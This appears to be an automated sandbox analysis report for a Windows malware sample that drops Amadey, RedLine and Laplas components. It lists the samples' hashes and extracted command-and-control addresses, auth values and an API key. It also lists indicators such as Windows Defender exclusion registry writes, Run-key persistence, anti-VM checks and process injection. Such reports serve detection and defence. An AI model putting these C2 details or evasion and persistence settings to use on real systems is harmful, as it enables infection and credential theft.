Analysis
-
max time kernel
300s -
max time network
303s -
platform
windows10-1703_x64 -
resource
win10-20230831-en -
resource tags
arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system -
submitted
04-09-2023 05:26
Behavioral task
behavioral1
Sample
u8542029.exe
Resource
win7-20230831-en
General
-
Target
u8542029.exe
-
Size
316KB
-
MD5
9be7155d4a92aee655188c13f3fb8a77
-
SHA1
fb89091adce9edb48f90539154d566b710df5f3e
-
SHA256
c8f3c74d30f1700a5c6a971318486e0ec9d67f29ce1ae32f3278bdfd21192cc8
-
SHA512
e9983afb7d5e6669ae2e5f471678e44e0ab54391cb22a59c914adccaebe5ab0dd57d788d7edcf032f68550a064f6685b7bf181c3a55da18fff3702b0850bf7cc
-
SSDEEP
6144:zR/tsQnf6X0M6+koYhXMxjwigfwfgbePu97rrAOQ322222KTq:zRlHVckoaXMxcePu97Hg22222iq
Malware Config
Extracted
amadey
3.87
193.233.255.9/nasa/index.php
-
install_dir
ebb444342c
-
install_file
legosa.exe
-
strings_key
0b59a358b8646634fe523e0d5fe7fc43
Extracted
redline
10K
77.232.38.234:80
-
auth_value
e0b9a8ef2c92da39d627d67103b3b93f
Extracted
redline
91.103.252.3:48665
-
auth_value
0c16e9e64d9b037e5f1ff9082d8f439f
Extracted
amadey
3.83
5.42.65.80/8bmeVwqx/index.php
-
install_dir
207aa4515d
-
install_file
oneetx.exe
-
strings_key
3e634dd0840c68ae2ced83c2be7bf0d4
Extracted
amadey
3.88
79.110.62.80/8bmeVwqx/index.php
-
install_dir
e8bff37b77
-
install_file
yiueea.exe
-
strings_key
dc58c693b6742b940cbf7234174a0f66
Extracted
redline
010923
happy1sept.tuktuk.ug:11290
-
auth_value
8338bf26f599326ee45afe9d54f7ef8e
Extracted
laplas
http://lpls.tuktuk.ug
-
api_key
a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral2/memory/2784-16-0x00000000008F0000-0x0000000000B1E000-memory.dmp family_redline behavioral2/memory/5000-24-0x0000000000400000-0x000000000045A000-memory.dmp family_redline behavioral2/memory/2784-34-0x00000000008F0000-0x0000000000B1E000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 21 IoCs
description pid Process procid_target PID 4408 created 3204 4408 msedge.exe 30 PID 2236 created 3204 2236 msedge.exe 30 PID 2780 created 3204 2780 msedge.exe 30 PID 4408 created 3204 4408 msedge.exe 30 PID 2236 created 3204 2236 msedge.exe 30 PID 4408 created 3204 4408 msedge.exe 30 PID 4408 created 3204 4408 msedge.exe 30 PID 2236 created 3204 2236 msedge.exe 30 PID 2236 created 3204 2236 msedge.exe 30 PID 2780 created 3204 2780 msedge.exe 30 PID 2780 created 3204 2780 msedge.exe 30 PID 2780 created 3204 2780 msedge.exe 30 PID 4408 created 3204 4408 msedge.exe 30 PID 2236 created 3204 2236 msedge.exe 30 PID 2780 created 3204 2780 msedge.exe 30 PID 6004 created 3204 6004 updater.exe 30 PID 6004 created 3204 6004 updater.exe 30 PID 6004 created 3204 6004 updater.exe 30 PID 6004 created 3204 6004 updater.exe 30 PID 6004 created 3204 6004 updater.exe 30 PID 6004 created 3204 6004 updater.exe 30 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ winlog.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ winlog.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ winlog.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ntlhost.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 69 4704 schtasks.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts msedge.exe File created C:\Windows\System32\drivers\etc\hosts msedge.exe File created C:\Windows\System32\drivers\etc\hosts msedge.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 4060 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion winlog.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion winlog.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion winlog.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion winlog.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ntlhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ntlhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion winlog.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion winlog.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Control Panel\International\Geo\Nation Meduza.exe -
Executes dropped EXE 41 IoCs
pid Process 4688 legosa.exe 2784 10c7b9izmah9.exe 4496 pf3bv0f2aw4mj.exe 4504 useyyoou_crypted.exe 3648 crypted158.exe 3968 Meduza.exe 4484 rockas.exe 2300 oneetx.exe 4220 cacls.exe 2812 cmd.exe 4748 ss41.exe 5028 yiueea.exe 4048 conhost.exe 3968 Meduza.exe 4944 winlog.exe 4408 msedge.exe 4460 toolspub2.exe 3924 taskhost.exe 4912 taskhost.exe 2616 winlog.exe 2236 msedge.exe 3200 31839b57a4f11171d6abc8bbc4451ee4.exe 5112 taskhost.exe 3988 winlog.exe 2780 msedge.exe 4704 schtasks.exe 5080 powercfg.exe 2896 powercfg.exe 4892 powershell.exe 6020 legosa.exe 5272 oneetx.exe 5260 yiueea.exe 6004 updater.exe 1708 31839b57a4f11171d6abc8bbc4451ee4.exe 1524 ntlhost.exe 4124 csrss.exe 5296 injector.exe 4196 windefender.exe 4560 windefender.exe 5032 ifvttru 5400 ifvttru -
Loads dropped DLL 4 IoCs
pid Process 2920 rundll32.exe 5640 rundll32.exe 5684 rundll32.exe 5720 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Meduza.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Meduza.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Meduza.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Meduza.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Meduza.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" winlog.exe Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" winlog.exe Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" winlog.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winlog.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winlog.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winlog.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ntlhost.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 api.ipify.org 47 api.ipify.org -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 10 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4944 winlog.exe 2616 winlog.exe 3988 winlog.exe 1524 ntlhost.exe -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 2784 set thread context of 5000 2784 10c7b9izmah9.exe 82 PID 4496 set thread context of 2796 4496 pf3bv0f2aw4mj.exe 84 PID 4504 set thread context of 4132 4504 useyyoou_crypted.exe 86 PID 3648 set thread context of 4516 3648 crypted158.exe 90 PID 4048 set thread context of 4912 4048 conhost.exe 122 PID 3924 set thread context of 4704 3924 taskhost.exe 199 PID 5112 set thread context of 2896 5112 taskhost.exe 198 PID 4460 set thread context of 4892 4460 toolspub2.exe 140 PID 6004 set thread context of 4048 6004 updater.exe 238 PID 6004 set thread context of 2304 6004 updater.exe 239 PID 5032 set thread context of 5400 5032 ifvttru 263 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe msedge.exe File created C:\Program Files\Google\Chrome\updater.exe msedge.exe File created C:\Program Files\Google\Chrome\updater.exe msedge.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\rss 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\rss\csrss.exe 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 21 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5416 sc.exe 5936 sc.exe 5728 sc.exe 5472 sc.exe 3880 sc.exe 748 sc.exe 3696 sc.exe 5416 sc.exe 5440 sc.exe 5980 sc.exe 1112 sc.exe 6068 sc.exe 5248 sc.exe 5236 sc.exe 3616 sc.exe 4220 sc.exe 5244 sc.exe 4140 sc.exe 4328 sc.exe 5496 sc.exe 3412 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 664 3648 WerFault.exe 87 5560 5684 WerFault.exe 143 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ifvttru Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ifvttru Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ifvttru -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2144 schtasks.exe 1640 schtasks.exe 744 schtasks.exe 5344 schtasks.exe 4396 schtasks.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 115 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-352 = "FLE Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-492 = "India Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5000 vbc.exe 2796 vbc.exe 4132 vbc.exe 2796 vbc.exe 2796 vbc.exe 5000 vbc.exe 5000 vbc.exe 4408 msedge.exe 4408 msedge.exe 2236 msedge.exe 2236 msedge.exe 4132 vbc.exe 4132 vbc.exe 5000 vbc.exe 2780 msedge.exe 2780 msedge.exe 4132 vbc.exe 4912 taskhost.exe 4912 taskhost.exe 4912 taskhost.exe 4912 taskhost.exe 5112 taskhost.exe 5112 taskhost.exe 4892 powershell.exe 4892 powershell.exe 4704 schtasks.exe 4704 schtasks.exe 4704 schtasks.exe 4704 schtasks.exe 4408 msedge.exe 4408 msedge.exe 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 4116 powershell.exe 4116 powershell.exe 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3204 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4892 powershell.exe 5400 ifvttru -
Suspicious use of AdjustPrivilegeToken 64 IoCs
